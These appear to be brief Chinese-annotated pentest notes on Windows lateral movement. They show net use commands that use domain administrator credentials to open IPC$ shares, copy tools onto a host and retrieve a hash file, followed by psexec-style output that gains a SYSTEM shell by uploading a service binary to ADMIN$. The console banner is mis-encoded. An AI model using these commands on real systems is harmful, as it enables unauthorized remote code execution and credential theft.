net use \\192.168.10.2 /u:domainname\administrator password 建立ipc连接 net use \\192.168.10.2 /de /y 删除ipc连接 net view \\192.168.10.2 查看共享目录 net view \\192.168.10.2\c$\users 列出指定目录文件 copy nbtscan.exe \\192.168.10.2\C$\windows\temp\ 复制文件 copy \\192.168.10.2\C$\windows\temp\hash.txt 下载文件
[*] Requesting shares on 192.168.10.201..... [*] Found writable share ADMIN$ [*] Uploading file XUUaBGPx.exe [*] Opening SVCManager on 192.168.10.201..... [*] Creating service eQxj on 192.168.10.201..... [*] Starting service eQxj..... [!] Press help for extra shell commands Microsoft Windows [░µ▒╛ 6.1.7601] ░µ╚¿╦∙╙╨ (c) 2009 Microsoft Corporationíú▒ú┴⌠╦∙╙╨╚¿└√íú
[*] Requesting shares on 192.168.10.201..... [*] Found writable share ADMIN$ [*] Uploading file ktRkscJe.exe [*] Opening SVCManager on 192.168.10.201..... [*] Creating service YvrT on 192.168.10.201..... [*] Starting service YvrT..... [!] Press help for extra shell commands nt authority\system [*] Process whoami finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on 192.168.10.201..... [*] Stopping service YvrT..... [*] Removing service YvrT..... [*] Removing file ktRkscJe.exe.....